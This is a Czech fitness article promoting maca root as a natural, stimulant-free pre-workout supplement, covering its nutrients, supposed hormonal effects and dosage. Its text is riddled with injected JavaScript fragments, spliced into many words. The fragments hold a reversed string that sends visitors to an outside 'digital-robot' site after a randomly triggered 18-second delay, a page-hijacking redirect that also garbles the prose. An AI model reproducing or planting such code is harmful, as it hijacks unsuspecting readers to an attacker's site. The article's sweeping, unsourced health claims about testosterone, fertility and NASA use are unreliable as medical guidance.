Výživa

MACA – PŘÍRODNÍ PŘEDTRÉNINKOVKA

Cesta k super tréninkovým výsledkům se neobejde bez obrovského úsilí, tvrdé disciplíny a v neposlední řadě také vyžaduje promyšlený přístup. Pokud má tělo dlouhodobě reagovat nárůstem hmoty, síly či výkonnosti, potřebuje dostávat stále nové podněty, na které se doposud neadaptobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovalo. A tentobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to postobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toj se vám vyplatí i v otázkách suplementace. Vsaďte tedy na méně tradiční přístupy.

Trendem poslední doby jsou tzv. předtréninkovky – produkty obsahující celou řadu ingrediencí. Jejich cílem je navýšit hladinu energie, podpořit koncentraci a celkově nabudit tělo k tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tomu, aby v tréninku podalo co nejlepší výkon.

Jestli chcete v rámci volby přetréninkového suplementu sáhnou po něčem novém, ale přestobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to vyzkoušeném a osvědčeném, nabízí se vám MACA.

Kořen peruánské rostliny maca se dnes řadí mezi tzv. superpotraviny a pro své léčivé a energizující účinky je používán již zhruba šest tisíc let. Má zcela unikátní schopnost harmonizovat tělesné funkce. Z odborného hlediska maca patří mezi adaptobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}togeny, tedy produkty rostlinného původy, které v těle navozují rovnováhu – navyšují hladinu energie, stejně jako mírní stres podle tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toho, co je zrovna třeba.

Jakým způsobem maca zkvalitní váš trénink?

Obsahuje kvalitní aminokyseliny a fytobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tonutrienty.

Maca je zdrojem 18 z 20 aminokyselin potřebných pro fungování lidského těla. A právě aminokyseliny jí umožní nejenom zvýšit fyzickou výkonnost, ale také následně podpořit regeneraci a růst svalové hmoty. Díky synergickým účinkům tzv. fytobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tonutrientů (látek rostlinného původu) má silné antioxidační účinky, takže sportobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovcům pomáhá v boji se škodlivými volnými radikály, které v těle vznikají při vyčerpávajícím tréninku.

Vliv na činnost štítné žlázy

O štítné žláze víme, že naprostobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to zásadním způsobem ovlivňuje hormonální funkce těla a činnost metabolismu. Pokud vám maca pomůže optimalizovat její funkce, můžete počítat s vytvořením velmi dobrých podmínek pro rozvoj fyzické výkonnosti.

Podpora vylučování testobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tosteronu

Maca byla histobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toricky využívána pro zvýšení hladiny energie a libida, za tytobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to účinky vděčí schopnosti navýšit hladinu testobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tosteronu a současně redukovat nadbytečný estrogen. To siloví sportobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovci bezpochyby ocení, protobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tože se tím pro ně zlepšují vyhlídky na nárůst svalové hmoty i síly, lepší regeneraci po výkonu či udržení stávající svalové hmoty.

Kvalitnější trénink i bez stimulantů

Ne každému vyhovují přetréninkové produkty s obsahem stimulantů. Hlavně z dlouhodobého hlediska mohou některým sportobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovcům přivodit potíže. Některé látky jsou při pravidelném užívání vysokých dávek spojovány s poškozením jater, jiné zase zvyšují riziko srdečních onemocnění. I protobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to dává smysl vyzkoušet přírodní předtréninkový suplement bez obsahu stimulantů.

Lepší spánek

Na jednu stranu vám maca přinese energii potřebnou pro výkon, na druhou stranu ale nenaruší spánek. Díky adaptobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}togenním účinkům zvládne vytvořit podmínky pro efektivnější trénink a vzápětí umožní fyzický i mentální odpočinek po cvičení.

Výkonnější metabolismus

Při dlouhodobém užívání maca podporuje metabolismus tuků a glukózy, podle všeho umožní tělu navýšit glykogenové rezervy, což se samozřejmě odrazí na celkové fyzické kondici.

Dávkování

Většinou se doporučuje užívat dávku ráno s cílem harmonizovat tělesné pochody i psychiku. Pokud ovšem chcete ovlivnit výkonnost, uvažujte o další dávce 1-2 hodiny před tréninkem. Obvykle se pro dosažení optimálních účinků doporučuje dlouhodobé užívání (6-12 týdnů). V rámci studie provedené s cyklisty bylo prokázáno, že jejich výkonnost i schopnost regenerace se zlepšily již po 14denním užívání.

 

Čím je maca zajímavá?

* Původně ji užívali Inkové. Jejich bojovníkům pomáhala zvládat náročné fyzické výkony ve vysokých nadmořských výškách, kde koncentrace kyslíku dosahuje pouze 40 % v porovnání s úrovní moře.

* V 90. letech ji NASA zařadila coby složku stravy astronautů.

* 100 g sušeného kořenu obsahuje 475 % denní doporučené dávky (DDD) vitaminu C, 82 % DDD železa a 300 % DDD mědi.

* Maca podporuje plodnost mužů, díky provedenému výzkumu víme, že se u sledovaných jedinců zvýšil celkový počet spermií o 84 % a jejich pohyblivost zlepšila o neuvěřitelných 109 %.